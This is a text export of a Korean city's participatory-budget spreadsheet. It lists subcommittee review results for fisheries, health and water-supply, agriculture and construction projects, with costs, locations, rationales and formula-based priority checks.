A10: 6 | B10: 수산경영과 | C10: 수산물 판로기반 확충 | D10: 120 | E10: 국외 | F10: LA한인축제 판촉행사, 국제우호 협력도시 판촉 행사 | G10: 해외 유명 축제 및 초청행사, 자매결연 도시 등에 우리시 우수 농수특산물 판촉행사 실시로 해외 수출시장 교두보 확보 | H10: 원안대로 가결 | I10: 1 | J10: 1 | K10: =IF(I10=J10,"맞음","틀림") -> 맞음
A11: 7 | B11: 수산경영과 | C11: 수산물 공동작업장 건립사업 | D11: 300 | E11: 어촌계 항포구 | F11: 공동작업장 1식 | G11: 지역 어업인들이 생산한 수산물, 가공판로에 어려움이 없도록 어촌계별 공동작업장 설치하여 일자리 창출로 소득기여 | H11: 원안대로 가결 | I11: 2 | J11: 2 | K11: =IF(I11=J11,"맞음","틀림") -> 맞음
A12: 8 | B12: 어업생산과 | C12: 양식어류 약제 지원 | D12: 35 | E12: 여수시 어류양식장 일원 | F12: 영양제 1,000포 | G12: 친환경 종합영양제를 공급함으로써 양식어류의 성장촉진과 항생제 사용억제에 따른 안전하고 고품질의 어류 생산 | H12: 원안대로 가결 | I12: 1 | J12: 1 | K12: =IF(I12=J12,"맞음","틀림") -> 맞음
A13: 9 | B13: 어업생산과 | C13: 해조류 조성 | D13: 300 | E13: 여수시 연안 일원 | F13: 투석 6,000㎥ | G13: 해조류 번식을 위한 기반조성으로 해양수질개선 및 수산자원 증식 등 해양생태계 활성화 | H13: 원안대로 가결 | I13: 2 | J13: 2 | K13: =IF(I13=J13,"맞음","틀림") -> 맞음
A14: 10 | B14: 어업생산과 | C14: 해상가두리 보호시설 지원사업 | D14: 59 | E14: 여수시 해상가두리 양식장 일원 | F14: 가두리 파도막이 2개소 | G14: 태풍, 강풍, 풍랑 등 자연재해로부터 가두리 시설을 보호하고 양식어업인의 안전사고 예방 | H14: 원안대로 가결 | I14: 3 | J14: 3 | K14: =IF(I14=J14,"맞음","틀림") -> 맞음
A15: 11 | B15: 해양항만레저과 | C15: 종화동 기존 부잔교 보수공사 | D15: 30 | E15: 종화동 | F15: 부잔교 체인교체 2개소(L=300m) | G15: 태풍, 풍랑 등 자연재해시 부잔교의 파손을 방지하기 위한 노후화된 체인 교체 | H15: 원안대로 가결 | I15: 1 | J15: 1 | K15: =IF(I15=J15,"맞음","틀림") -> 맞음
A16: 12 | B16: 해양항만레저과 | C16: 돌산읍 항대도 해안 도로 개설공사 | D16: 200 | E16: 돌산읍 금봉리 | F16: 호안도로개설 100m | G16: 굴패각장으로 진출입할 수 있는 호안도로 개설로 주민 보행 및 차량통행 편의제공 | H16: 원안대로 가결 | I16: 2 | J16: 2 | K16: =IF(I16=J16,"맞음","틀림") -> 맞음
... A65: 61 | B65: 섬자원개발과 | C65: 돌산읍 하동 월전포 선착장 보강공사 | D65: 200 | E65: 돌산읍 | F65: 선착장 보강 L=30m | G65: 태풍해일로 인한 어항시설 및 어선을 보호하기 위한 TTP설치로 재해예방 | H65: 원안대로 가결 | I65: 49 | J65: 49 | K65: =IF(I65=J65,"맞음","틀림") -> 맞음
K68: =IF(I68=J68,"맞음","틀림") -> 맞음

Sheet 보건위생분과표지
A3: 보건·위생분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F12) -> 13 | G7: 건, | I7: =SUM(I9:I12) -> 1431
C9: ㅇ | D9: 건강증진과 | E9: : | F9: =COUNTIF(보건위생분과!$B$5:$B$1000,보건위생분과표지!D9) -> 1 | G9: 건, | I9: =SUMPRODUCT((보건위생분과!$B$5:$B$10000=보건위생분과표지!D9)*(보건위생분과!$D$5:$D$10000)) -> 41
C10: ㅇ | D10: 상수도과 | E10: : | F10: =COUNTIF(보건위생분과!$B$5:$B$1000,보건위생분과표지!D10) -> 12 | G10: 건, | I10: =SUMPRODUCT((보건위생분과!$B$5:$B$10000=보건위생분과표지!D10)*(보건위생분과!$D$5:$D$10000)) -> 1390

Sheet 우선순위보건위생
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B11) -> 13 | C4: =SUM(C5:C11) -> 0
A5: 건강증진과 | B5: =COUNTIF(보건위생분과!$B$5:$B$17,우선순위보건위생!A5) -> 1 | C5: =COUNTIFS(보건위생분과!$B$5:$B$10000,A5,보건위생분과!$K$5:$K$10000,"틀림") -> 0 | D5: ㅇ 원안대로 가결
A6: 상수도과 | B6: =COUNTIF(보건위생분과!$B$5:$B$17,우선순위보건위생!A6) -> 12 | C6: 0 | D6: ㅇ 원안대로 가결

Sheet 보건위생분과
A1: 주민참여 예산제 보건·위생 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 계 | C4: =COUNTA(C5:C65) -> 13 | D4: =SUM(D5:D65) -> 1431
A5: 1 | B5: 건강증진과 | C5: 방역기 소음방지시설 설치비 | D5: 41 | F5: 1식 | G5: 이전 수리소의 소음방지시설(방음벽, 내부 방음시설, 소음기 제작) | H5: 원안가결 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 상수도과 | C6: 마을상수도시설 유지보수(도서지역 53개소) | D6: 100 | E6: 도서지역 | F6: 도서지역 소규모수도시설 53개소 | G6: 도서지역 소규모수도시설 중 수중모터 고장, 관로누수 등으로 인한 주민식수 이용 불편을 즉시 해소 | H6: 원안가결 | I6: 1 | J6: 1 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 상수도과 | C7: 마을상수도시설 유지보수(육지지역 100개소) | D7: 150 | E7: 육지지역 | F7: 육지지역 소규모수도시설 100개소 | G7: 육지지역 소규모수도시설 중 수중 모터 고장, 관로누수 등으로 인한 주민식수 이용 불편을 즉시 해소 | H7: 원안가결 | I7: 2 | J7: 2 | K7: =IF(I7=J7,"맞음","틀림") -> 맞음
A8: 4 | B8: 상수도과 | C8: 삼산대동마을 소규모수도시설 관로교체공사 | D8: 70 | E8: 삼산면 초도리 대동마을 | F8: 관로교체 L=1.3Km | G8: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H8: 원안가결 | I8: 6 | J8: 6 | K8: =IF(I8=J8,"맞음","틀림") -> 맞음
A9: 5 | B9: 상수도과 | C9: 삼산 변촌마을 소규모수도시설 관로교체공사 | D9: 80 | E9: 삼산면 서도리 변촌마을 | F9: 관로교체 L=1.5Km | G9: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H9: 원안가결 | I9: 9 | J9: 9 | K9: =IF(I9=J9,"맞음","틀림") -> 맞음
A10: 6 | B10: 상수도과 | C10: 삼산 서도마을1 소규모수도시설 관로교체공사 | D10: 50 | E10: 삼산면 서도리1 | F10: 관로교체 L=1.0Km | G10: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H10: 원안가결 | I10: 11 | J10: 11 | K10: =IF(I10=J10,"맞음","틀림") -> 맞음
A11: 7 | B11: 상수도과 | C11: 삼산 서도마을2 소규모수도시설 관로교체공사 | D11: 50 | E11: 삼산면 서도리2 | F11: 관로교체 L=1.2Km | G11: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H11: 원안가결 | I11: 12 | J11: 12 | K11: =IF(I11=J11,"맞음","틀림") -> 맞음
A12: 8 | B12: 상수도과 | C12: 화양 대옥마을 소규모수도시설 관로교체공사 | D12: 90 | E12: 화양면 옥적리 대옥마을 | F12: 관로교체 L=1.2Km | G12: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H12: 원안가결 | I12: 8 | J12: 8 | K12: =IF(I12=J12,"맞음","틀림") -> 맞음
A13: 9 | B13: 상수도과 | C13: 화정 상하도 소규모수도시설 관로교체공사 | D13: 100 | E13: 화정면 상하리 | F13: 관로교체 L=2.2Km | G13: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H13: 원안가결 | I13: 10 | J13: 10 | K13: =IF(I13=J13,"맞음","틀림") -> 맞음
A14: 10 | B14: 상수도과 | C14: 돌산 월암마을 소규모수도시설 관로교체공사 | D14: 150 | E14: 돌산읍 평사리 월암마을 | F14: 관로교체 L=3.0Km | G14: 관로 노후로 인한 잦은 누수로 주민 급수 이용에 불편이 있어 관로교체 시급 | H14: 원안가결 | I14: 7 | J14: 7 | K14: =IF(I14=J14,"맞음","틀림") -> 맞음
A15: 11 | B15: 상수도과 | C15: 소규모수도시설 물탱크(휀스등) 보안시설 설치공사 | D15: 100 | E15: 소규수도시설 153개소 | F15: 휀스설치 5개소 영상감시장비 20개소 | G15: 소규모수도시설 식수원 보호를 위한 영상 감시장비 및 휀스설치 | H15: 원안가결 | I15: 3 | J15: 5 | K15: =IF(I15=J15,"맞음","틀림") -> 틀림
A16: 12 | B16: 상수도과 | C16: 소규모수도시설 자동수위기및염소투입기 설치공사 | D16: 100 | E16: 소규모수도 시설 153개소 | F16: 자동수위기교체 4개소 염소투입기교체 5개소 | G16: 주민들의 안정적인 생활용수 공급을 위하여 노후된 자동수위조절기 및 염소 투입기 교체로 주민불편 해소 | H16: 원안가결 | I16: 4 | J16: 4 | K16: =IF(I16=J16,"맞음","틀림") -> 맞음
A17: 13 | B17: 상수도과 | C17: 먹는물 공동시설(약수터) 대체수원개발및이용시설공사(구봉산 약수터외 6개소) | D17: 350 | E17: 구봉산약수터 외 6개소 | F17: 약수터 6개소 음수대 1개소 | G17: 먹는물공동시설(약수터,음수대)수질검사 부적합 시설에 대한 대체수원개발 | H17: 원안가결 | I17: 5 | J17: 3 | K17: =IF(I17=J17,"맞음","틀림") -> 틀림

Sheet 농업분과표지
A3: 농업분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F12) -> 55 | G7: 건, | I7: =SUM(I9:I12) -> 5795
C9: ㅇ | D9: 농업정책과 | E9: : | F9: =COUNTIF(농업분과!$B$5:$B$1000,농업분과표지!D9) -> 30 | G9: 건, | I9: =SUMIF(농업분과!$B$5:$B$1000,농업분과표지!D9,농업분과!$D$5:$D$1000) -> 3508.5
C10: ㅇ | D10: 농촌지원과 | E10: : | F10: =COUNTIF(농업분과!$B$5:$B$1000,농업분과표지!D10) -> 4 | G10: 건, | I10: =SUMIF(농업분과!$B$5:$B$1000,농업분과표지!D10,농업분과!$D$5:$D$1000) -> 488
C11: ㅇ | D11: 기술보급과 | E11: : | F11: =COUNTIF(농업분과!$B$5:$B$1000,농업분과표지!D11) -> 11 | G11: 건, | I11: =SUMIF(농업분과!$B$5:$B$1000,농업분과표지!D11,농업분과!$D$5:$D$1000) -> 1001
C12: ㅇ | D12: 특산품육성과 | E12: : | F12: =COUNTIF(농업분과!$B$5:$B$1000,농업분과표지!D12) -> 10 | G12: 건, | I12: =SUMIF(농업분과!$B$5:$B$1000,농업분과표지!D12,농업분과!$D$5:$D$1000) -> 797.5

Sheet 우선순위농업
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B8) -> 55 | C4: =SUM(C5:C8) -> 0
A5: 농업정책과 | B5: =COUNTIF(농업분과!$B$5:$B$1000,우선순위농업!A5) -> 30 | C5: =COUNTIFS(농업분과!$B$5:$B$10000,A5,농업분과!$K$5:$K$10000,"틀림") -> 0 | D5: ㅇ 원안대로 가결
A6: 농촌지원과 | B6: =COUNTIF(농업분과!$B$5:$B$1000,우선순위농업!A6) -> 4 | C6: =COUNTIFS(농업분과!$B$5:$B$10000,A6,농업분과!$K$5:$K$10000,"틀림") -> 0 | D6: ㅇ 원안대로 가결
A7: 기술보급과 | B7: =COUNTIF(농업분과!$B$5:$B$1000,우선순위농업!A7) -> 11 | C7: =COUNTIFS(농업분과!$B$5:$B$10000,A7,농업분과!$K$5:$K$10000,"틀림") -> 0 | D7: ㅇ 원안대로 가결
A8: 특산품육성과 | B8: =COUNTIF(농업분과!$B$5:$B$1000,우선순위농업!A8) -> 10 | C8: =COUNTIFS(농업분과!$B$5:$B$10000,A8,농업분과!$K$5:$K$10000,"틀림") -> 0 | D8: ㅇ 원안대로 가결

Sheet 농업분과
A1: 주민참여 예산제 농업 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 계 | C4: =COUNTA(C5:C65) -> 55 | D4: =SUM(D5:D65) -> 5795
A5: 1 | B5: 농업정책과 | C5: 밭작물 관리기 지원사업 | D5: 132 | E5: 농업인 | F5: 120대 | G5: 관리기 지원을 통한 고령화된 농촌일손부족 해소 및 농업생산성 향상 | H5: 원안가결 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 농업정책과 | C6: 밭작물 관리기 구입 지원사업(농협과 협력사업) | D6: 55 | E6: 농업인 | F6: 100대 | G6: 농협과 협력사업을 통해 농업인이 선호하는 관리기를 지원함으로써 농촌노동력 부족해소 및 지역농업활성화 | H6: 원안가결 | I6: 2 | J6: 2 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 농업정책과 | C7: 로컬푸드 농가 육성 지원사업 | D7: 100 | E7: 농업인 | F7: 1ha | G7: 생산자와 소비자간 직거래를 통한 유통단계 축소로 소비자와 생산자 이익실현하고 안정적인 유통공급 체계구축을 위한 규모화된 농가육성 필요 | H7: 원안가결 | I7: 3 | J7: 3 | K7: =IF(I7=J7,"맞음","틀림") -> 맞음
A8: 4 | B8: 농업정책과 | C8: 돌발 병해충 방제 자재 지원 | D8: 240 | E8: 벼친환경 농업단지내 농업인 | F8: 1,000ha | G8: 여름철 이상고온으로 인한 각종 병해충 발생이 증가함에 따라 친환경농업단지별 적기 방제를 통한 피해 최소화를 위한 병해충 방제비 지원 필요 | H8: 원안가결 | I8: 4 | J8: 4 | K8: =IF(I8=J8,"맞음","틀림") -> 맞음
A9: 5 | B9: 농업정책과 | C9: 벼 육묘용 상토 공급사업 | D9: 245 | E9: 농업인 | F9: 100,000포 | G9: 못자리 설치시 양질의 상토공급으로 노동력 절감 및 고품질 쌀 생산 가능 | H9: 원안가결 | I9: 5 | J9: 5 | K9: =IF(I9=J9,"맞음","틀림") -> 맞음
A10: 6 | B10: 농업정책과 | C10: 대형 농기계 구입 지원사업 | D10: 50 | E10: 농업인 및 영농법인 | F10: 10대 | G10: 농업인력 고령화에 따른 농작업의 기계화를 통한 노동력 부족 해소 및 농업생산성 지속 확보 | H10: 원안가결 | I10: 6 | J10: 6 | K10: =IF(I10=J10,"맞음","틀림") -> 맞음
A11: 7 | B11: 농업정책과 | C11: 친환경농업단지 논밭두렁 피복제 지원 | D11: 74 | E11: 친환경농업 실천농가 | F11: 1,000ha | G11: 친환경 농업 실천 농가의 고령화, 부녀화로 일손부족에 따른 논밭두렁 잡초 제거 농가 어려움 해소 | H11: 원안가결 | I11: 7 | J11: 7 | K11: =IF(I11=J11,"맞음","틀림") -> 맞음
A12: 8 | B12: 농업정책과 | C12: 소규모 다목적 텃밭 시설하우스지원사업 | D12: 50 | E12: 농업인 | F12: 0.5ha | G12: 노지채소 재배지역과 도시농업활성화를 위한 다목적텃밭하우스를 지원하여 틈새작물, 농산물건조 등으로 활용함으로써 농가경영 안정 도모 | H12: 원안가결 | I12: 8 | J12: 8 | K12: =IF(I12=J12,"맞음","틀림") -> 맞음
A13: 9 | B13: 농업정책과 | C13: 시설하우스 수확물 운반시설 지원사업 | D13: 130 | E13: 농업인 | F13: 10ha | G13: 농촌노동력 고령화로 농작물 수확 및 운반에 어려움을 겪고 있는 시설원예 재배농가에 농작업 편의시설을 지원하여 노동력 절감을 통한 농가경영안정 도모 | H13: 원안가결 | I13: 9 | J13: 9 | K13: =IF(I13=J13,"맞음","틀림") -> 맞음
A14: 10 | B14: 농업정책과 | C14: 친환경 인증농가 자재 지원사업 | D14: 52.5 | E14: 친환경인증 취득농가 | F14: 150ha | G14: 친환경 인증취득농가에 자재 지원을 통해 친환경농업 지속 및 인증단계 상향으로 고품질 안전농산물 생산 | H14: 원안가결 | I14: 10 | J14: 10 | K14: =IF(I14=J14,"맞음","틀림") -> 맞음
A15: 11 | B15: 농업정책과 | C15: 귀 농업인 유치 우수마을 인센티브 지원 | D15: 50 | E15: 해당마을 | F15: 3개마을 | G15: 귀농업인 귀농 후 마을 주민들과 융화가 잘 이루어지지 않아 도시 재이주 등 문제가 발생함에 따라 귀농업인 유치 우수마을에 대한 인센티브를 지원 | H15: 원안가결 | I15: 11 | J15: 11 | K15: =IF(I15=J15,"맞음","틀림") -> 맞음
A16: 12 | B16: 농업정책과 | C16: 조사료이용 미생물 발효기 지원사업 | D16: 60 | E16: 한우농가 | F16: 10대 | G16: 유용한 미생물을 활용한 발효사료 생산 급여로 소화율, 증체율, 사료 이용효율을 높이고 농가 생산비 절감과 경영안정 도모 | H16: 원안가결 | I16: 12 | J16: 12 | K16: =IF(I16=J16,"맞음","틀림") -> 맞음
... A59: 55 | B59: 특산품육성과 | C59: 안전 농산물 규격포장재 지원사업 | D59: 44 | E59: 여수시 일원 | F59: 88천매(포장재) | G59: 안전농산물 생산농가 유통비용 절감을 통한 경쟁력 제고 및 확대 육성 | H59: 원안가결 | I59: 10 | J59: 10 | K59: =IF(I59=J59,"맞음","틀림") -> 맞음

Sheet 도시건설분과표지
A3: 도시·건설 분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F19) -> 372 | G7: 건, | I7: =SUM(I9:I19) -> 103842.8
C9: ㅇ | D9: 도시계획과 | E9: : | F9: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D9) -> 1 | G9: 건, | I9: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D9,도시건설분과!$D$5:$D$1000) -> 300
C10: ㅇ | D10: 건설방재과 | E10: : | F10: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D10) -> 178 | G10: 건, | I10: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D10,도시건설분과!$D$5:$D$1000) -> 13120
C11: ㅇ | D11: 도로과 | E11: : | F11: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D11) -> 65 | G11: 건, | I11: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D11,도시건설분과!$D$5:$D$1000) -> 45337
C12: ㅇ | D12: 건축과 | E12: : | F12: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D12) -> 3 | G12: 건, | I12: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D12,도시건설분과!$D$5:$D$1000) -> 1628
C13: ㅇ | D13: 교통행정과 | E13: : | F13: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D13) -> 6 | G13: 건, | I13: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D13,도시건설분과!$D$5:$D$1000) -> 901
C14: ㅇ | D14: 도로관리사업소 | E14: : | F14: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D14) -> 35 | G14: 건, | I14: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D14,도시건설분과!$D$5:$D$1000) -> 6955
C15: ㅇ | D15: 도시디자인과 | E15: : | F15: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D15) -> 13 | G15: 건, | I15: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D15,도시건설분과!$D$5:$D$1000) -> 3979
C16: ㅇ | D16: 도시재생과 | E16: : | F16: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D16) -> 3 | G16: 건, | I16: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D16,도시건설분과!$D$5:$D$1000) -> 1097.8
C17: ㅇ | D17: 공영개발과 | E17: : | F17: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D17) -> 1 | G17: 건, | I17: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D17,도시건설분과!$D$5:$D$1000) -> 150
C18: ㅇ | D18: 산림과 | E18: : | F18: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D18) -> 6 | G18: 건, | I18: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D18,도시건설분과!$D$5:$D$1000) -> 785
C19: ㅇ | D19: 공원과 | E19: : | F19: =COUNTIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D19) -> 61 | G19: 건, | I19: =SUMIF(도시건설분과!$B$5:$B$1000,도시건설분과표지!D19,도시건설분과!$D$5:$D$1000) -> 29590

Sheet 우선순위도시건설
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B15) -> 372 | C4: -
A5: 도시계획과 | B5: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A5) -> 1 | C5: =COUNTIFS(도시건설분과!$B$5:$B$10000,A5,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D5: ㅇ 원안대로 가결
A6: 건설방재과 | B6: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A6) -> 178 | C6: =COUNTIFS(도시건설분과!$B$5:$B$10000,A6,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D6: ㅇ 원안대로 가결
A7: 도로과 | B7: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A7) -> 65 | C7: =COUNTIFS(도시건설분과!$B$5:$B$10000,A7,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D7: ㅇ 원안대로 가결
A8: 건축과 | B8: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A8) -> 3 | C8: =COUNTIFS(도시건설분과!$B$5:$B$10000,A8,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D8: ㅇ 원안대로 가결
A9: 교통행정과 | B9: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A9) -> 6 | C9: =COUNTIFS(도시건설분과!$B$5:$B$10000,A9,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D9: ㅇ 원안대로 가결
A10: 도로관리사업소 | B10: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A10) -> 35 | C10: =COUNTIFS(도시건설분과!$B$5:$B$10000,A10,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D10: ㅇ 원안대로 가결
A11: 도시디자인과 | B11: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A11) -> 13 | C11: =COUNTIFS(도시건설분과!$B$5:$B$10000,A11,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D11: ㅇ 원안대로 가결
A12: 도시재생과 | B12: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A12) -> 3 | C12: =COUNTIFS(도시건설분과!$B$5:$B$10000,A12,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D12: ㅇ 원안대로 가결
A13: 공영개발과 | B13: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A13) -> 1 | C13: =COUNTIFS(도시건설분과!$B$5:$B$10000,A13,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D13: ㅇ 원안대로 가결
A14: 산림과 | B14: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A14) -> 6 | C14: =COUNTIFS(도시건설분과!$B$5:$B$10000,A14,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D14: ㅇ 원안대로 가결
A15: 공원과 | B15: =COUNTIF(도시건설분과!$B$5:$B$1000,우선순위도시건설!A15) -> 61 | C15: =COUNTIFS(도시건설분과!$B$5:$B$10000,A15,도시건설분과!$K$5:$K$10000,"틀림") -> 0 | D15: ㅇ 원안대로 가결

Sheet 도시건설분과
A1: 주민참여예산제 도시·건설 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 계 | C4: =COUNTA(C5:C10000) -> 372 | D4: =SUM(D5:D10000) -> 103842.8
A5: 1 | B5: 도시계획과 | C5: 문수 2지구 지구단위계획구역 정비사업 | D5: 300 | E5: 문수동 55-1 번지 일원 | F5: 도로확장 L= 700m, B= 20m (교량1개소) | G5: 문수 주택단지 기반시설이 열악하여 생활불편이 가중되고 있는 실정으로 도시환경개선 필요 | H5: 원안가결 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 건설방재과 | C6: 자연친화형 연등천 개발공사 | D6: 300 | E6: 연등천 | F6: 하천정비 L=6.14km | G6: 원 도심을 관통하는 연등천을 시민들이 쾌적하고 건강하게 이용할 수 있도록 수변공간과 연계한 종합 정비방안 수립 | H6: 원안가결 | I6: 1 | J6: 1 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 건설방재과 | C7: 하천 기성제 정비공사 (시비50%, 도비 50%) | D7: 50 | E7: 관내 | F7: 지방하천 12개소 정비 | G7: 지방하천의 지속적인 유지관리로 자연재해 예방 | H7: 원안가결 | I7: 6 | J7: 6 | K7: =IF(I7=J7,"맞음","틀림") -> 맞음
A8: 4 | B8: 건설방재과 | C8: 하천 재해예방 퇴적토 준설사업 (시비50%, 도비 50%) | D8: 70 | E8: 관내 | F8: 지방하천 12개소 준설 | G8: 지방하천의 지속적인 유지관리로 자연재해 예방 | H8: 원안가결 | I8: 5 | J8: 5 | K8: =IF(I8=J8,"맞음","틀림") -> 맞음
A9: 5 | B9: 건설방재과 | C9: 지방하천유지관리 (시비50%, 도비 50%) | D9: 280 | E9: 관내 | F9: 지방하천 12개소 유지관리 | G9: 지방하천의 지속적인 유지관리로 자연재해 예방 | H9: 원안가결 | I9: 3 | J9: 3 | K9: =IF(I9=J9,"맞음","틀림") -> 맞음
A10: 6 | B10: 건설방재과 | C10: 돌산읍 돌산천 교량 설치공사 | D10: 100 | E10: 돌산읍 평사리 돌산천 | F10: 교량설치 1개소 | G10: 교량설치로 주민 영농여건 개선 및 주민숙원사업 해결 | H10: 원안가결 | I10: 16 | J10: 16 | K10: =IF(I10=J10,"맞음","틀림") -> 맞음
A11: 7 | B11: 건설방재과 | C11: 둔덕동 연등천 난간 정비공사 | D11: 50 | E11: 둔덕동 | F11: 난간교체 1식 | G11: 연등천 노후 난간 교체로 주민안전사고 예방 및 주변환경 개선 | H11: 원안가결 | I11: 18 | J11: 18 | K11: =IF(I11=J11,"맞음","틀림") -> 맞음
A12: 8 | B12: 건설방재과 | C12: 소하천 정비 종합계획 용역 | D12: 4000 | E12: 관내 소하천 114개소 | F12: 소하천 종합계획 114개소 | G12: 소하천 정비법 제6조에 따라 10년 마다 소하천 정비 종하계획 수립 | H12: 원안가결 | I12: 9 | J12: 9 | K12: =IF(I12=J12,"맞음","틀림") -> 맞음
A13: 9 | B13: 건설방재과 | C13: 소하천 수초제거 및 유지관리 | D13: 90 | E13: 관내 소하천 | F13: 수초제거 및 유지관리 1식 | G13: 우기철 이전 유수소통 장애물인 수초제거로 수해피해 예방 하고 소하천 응급 복구. | H13: 원안가결 | I13: 2 | J13: 2 | K13: =IF(I13=J13,"맞음","틀림") -> 맞음
A14: 10 | B14: 건설방재과 | C14: 돌산읍 덕개 소하천 정비공사 | D14: 70 | E14: 돌산읍 죽포리 | F14: 하천정비 L=0.8km | G14: 침수피해 예방을 위한 하천정비 | H14: 원안가결 | I14: 8 | J14: 8 | K14: =IF(I14=J14,"맞음","틀림") -> 맞음
A15: 11 | B15: 건설방재과 | C15: 돌산읍 작금2 소하천 교량 정비공사 | D15: 30 | E15: 돌산읍 금성리 | F15: 교량설치 1개소 | G15: 교량설치로 주민 영농여건 개선 및 주민숙원사업 해결 | H15: 원안가결 | I15: 13 | J15: 13 | K15: =IF(I15=J15,"맞음","틀림") -> 맞음
A16: 12 | B16: 건설방재과 | C16: 소라면 중촌1 소하천 준설공사 | D16: 100 | E16: 소라면 현천리~관기리 지선 | F16: 수초제거 L=0.4km, B=25m | G16: 소규모 주민숙원사업으로 지역 주민의 고충 및 불편사항 해소 | H16: 원안가결 | I16: 4 | J16: 4 | K16: =IF(I16=J16,"맞음","틀림") -> 맞음
... A183: 179 | B183: 건설방재과 | C183: 삼일동 원호명 마을회관 증축공사 | D183: 60 | E183: 호명동 528 | F183: 1식 | G183: 마을숙원사업 해결 | H183: 원안가결 | I183: 178 | J183: 178 | K183: =IF(I183=J183,"맞음","틀림") -> 맞음
A184: 180 | B184: 도로과 | C184: 미평~만흥 도로 확포장공사 | D184: 2900 | E184: 미평동 | F184: 2200 | G184: 해양경찰교육원 이전에 따른 기반시설 확충으로 교통소통 원활 | H184: 원안가결 | I184: 1 | J184: 1 | K184: =IF(I184=J184,"맞음","틀림") -> 맞음
